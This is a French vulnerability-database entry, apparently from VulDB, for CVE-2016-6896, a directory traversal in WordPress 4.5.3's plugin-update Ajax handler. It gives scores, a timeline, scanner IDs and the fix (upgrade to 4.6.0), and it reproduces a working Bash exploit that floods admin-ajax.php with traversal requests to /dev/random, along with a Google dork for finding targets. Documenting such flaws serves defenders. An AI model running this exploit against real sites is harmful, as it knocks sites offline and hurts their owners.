WordPress 4.5.3 ajax-actions.php wp_ajax_update_plugin directory traversal

CVSS Score méta-temporairePrix actuel de l'exploit (≈)Score d'intérêt CTI
6.8$0-$5k0.00

Résuméinformation

Une vulnérabilité qui a été classée problématique a été trouvée dans WordPress 4.5.3. L'élément concerné est la fonction wp_ajax_update_plugin du fichier ajax-actions.php. La manipulation conduit à directory traversal. Cette vulnérabilité est connue comme CVE-2016-6896. Il est possible d'initialiser l'attaque à distance. En outre, un exploit est accessible. Il est conseillé de procéder à la mise à niveau du composant concerné.

Détailsinformation

Une vulnérabilité classée critique a été trouvée dans WordPress 4.5.3 (Content Management System). Affecté par ce problème est la fonction wp_ajax_update_plugin du fichier ajax-actions.php. La manipulation avec une valeur d'entrée inconnue mène à une vulnérabilité de classe directory traversal.

La vulnerabilité a été publié en 22/08/2016 par Yorick Koster avec le numéro d'identification Path traversal vulnerability in WordPress Core Ajax handlers avec bulletin (Website) (confirmé). La notice d'information est disponible en téléchargement sur sumofpwn.nl Cette vulnérabilité est identifiée comme CVE-2016-6896. Résultat facile à exploiter. Il est possible d'initialiser l'attaque à distance. Une exploitation réussie requiert une seule session d'authentification. Des details techniques et un public exploit sont connus.

Un exploit a été developpé en Bash et a été publié immédiatement après la notice d'information. L'exploit est disponible au téléchargment sur sumofpwn.nl. Il est déclaré comme fonctionnel. En cherchant des informations à propos de inurl:ajax-actions.php, il est possible de trouver des cibles vulnérables avec Google Hacking. Le scanner de vulnérabilités Nessus propose un module ID 93111 (WordPress < 4.6 Multiple Vulnerabilities), lequel aide à déterminer l'existence d'une faille dans l'environnement-cible. Le code utilisé par l'exploit est:

#!/bin/bash
target="http://<target>"
username="subscriber"
password="password"
cookiejar=$(mktemp)
   
# login
curl --cookie-jar "$cookiejar" \
   --data "log=$username&pwd=$password&wp-submit=Log+In&redirect_to=%2f&testcookie=1" \
   "$target/wp-login.php" \
   >/dev/null 2>&1
   
# exhaust apache
for i in `seq 1 1000`
   do
      curl --cookie "$cookiejar" \
      --data "plugin=../../../../../../../../../../dev/random&action=update-plugin" \
      "$target/wp-admin/admin-ajax.php" \
      >/dev/null 2>&1 &
done
   
rm "$cookiejar"

Mettre à jour à la version 4.6.0 élimine cette vulnérabilité. La mise à jour est disponible au téléchargment sur codex.wordpress.org. Une solution envisageable a été publiée même avant, et non après après la publication de la vulnérabilité.

La vulnérabilité est aussi documentée dans les base de données Exploit-DB (40288), Tenable (93111), SecurityFocus (BID 92572†) et SecurityTracker (ID 1036683†). If you want to get best quality of vulnerability data, you may have to visit VulDB.

Produitinformation

Taper

Nom

Version

Licence

Site web

CPE 2.3information

CPE 2.2information

CVSSv4information

VulDB Vecteur: 🔍
VulDB Fiabilité: 🔍

CVSSv3information

VulDB Score méta-base: 7.1
VulDB Score méta-temporaire: 6.8

VulDB Note de base: 7.1
VulDB Note temporaire: 6.6
VulDB Vecteur: 🔍
VulDB Fiabilité: 🔍

NVD Note de base: 7.1
NVD Vecteur: 🔍

CVSSv2information

AVACAuCIA
💳💳💳💳💳💳
💳💳💳💳💳💳
💳💳💳💳💳💳
VecteurComplexitéAuthentificationConfidentialitéIntégritéDisponibilité
DéverrouillerDéverrouillerDéverrouillerDéverrouillerDéverrouillerDéverrouiller
DéverrouillerDéverrouillerDéverrouillerDéverrouillerDéverrouillerDéverrouiller
DéverrouillerDéverrouillerDéverrouillerDéverrouillerDéverrouillerDéverrouiller

VulDB Note de base: 🔍
VulDB Note temporaire: 🔍
VulDB Fiabilité: 🔍

NVD Note de base: 🔍

Exploitationinformation

Classe: Directory traversal
CWE: CWE-22
CAPEC: 🔍
ATT&CK: 🔍

Physique: Non
Local: Non
Remote: Oui

Disponibilité: 🔍
Accès: Public
Statut: Fonctionnel
Langage de programmation: 🔍
Télécharger: 🔍
Google Hack: 🔍

EPSS Score: 🔍
EPSS Percentile: 🔍

Prédiction de prix: 🔍
Estimation actuelle des prix: 🔍

0-DayDéverrouillerDéverrouillerDéverrouillerDéverrouiller
Aujourd'huiDéverrouillerDéverrouillerDéverrouillerDéverrouiller

Nessus ID: 93111
Nessus Nom: WordPress < 4.6 Multiple Vulnerabilities
Nessus Fichier: 🔍
Nessus Risque: 🔍
Nessus Famille: 🔍
Nessus Context: 🔍

OpenVAS ID: 64581
OpenVAS Nom: Fedora Update for wordpress FEDORA-2016-91bfe9ddb8
OpenVAS Fichier: 🔍
OpenVAS Famille: 🔍

Qualys ID: 🔍
Qualys Nom: 🔍

Exploit-DB: 🔍

Renseignements sur les menacesinformation

Intérêt: 🔍
Acteurs actifs: 🔍
Groupes APT actifs: 🔍

Contre-mesuresinformation

Recommandé: Mise à niveau
Statut: 🔍

Heure 0 jour: 🔍
Délai d'exploitation: 🔍

Mise à niveau: WordPress 4.6.0

Chronologieinformation

16/08/2016 🔍
20/08/2016 +4 jours 🔍
22/08/2016 +2 jours 🔍
22/08/2016 +0 jours 🔍
22/08/2016 +0 jours 🔍
22/08/2016 +0 jours 🔍
23/08/2016 +1 jours 🔍
25/08/2016 +2 jours 🔍
18/01/2017 +146 jours 🔍
13/05/2026 +3402 jours 🔍

Sourcesinformation

Produit: wordpress.com

Bulletin: Path traversal vulnerability in WordPress Core Ajax handlers
Chercheur: Yorick Koster
Statut: Confirmé
Confirmation: 🔍

CVE: CVE-2016-6896 (🔍)
GCVE (CVE): GCVE-0-2016-6896
GCVE (VulDB): GCVE-100-90906
SecurityFocus: 92572 - WordPress CVE-2016-6897 Cross Site Request Forgery Vulnerability
SecurityTracker: 1036683

scip Labs: https://www.scip.ch/en/?labs.20161013
Divers: 🔍
Voir aussi: 🔍

Entréeinformation

Créé: 23/08/2016 11:19
Mise à jour: 13/05/2026 18:43
Changements: 23/08/2016 11:19 (83), 08/05/2019 12:58 (10), 14/09/2022 09:31 (4), 02/02/2025 15:09 (14), 13/05/2026 18:43 (1)
Complet: 🔍
Cache ID: 216::103

If you want to get best quality of vulnerability data, you may have to visit VulDB.

Discussion

Aucun commentaire pour l'instant. Langues: fr + it + en.

Veuillez vous connecter pour commenter.

PrécédentAperçuSuivant

Do you know our Splunk app?

Download it now for free!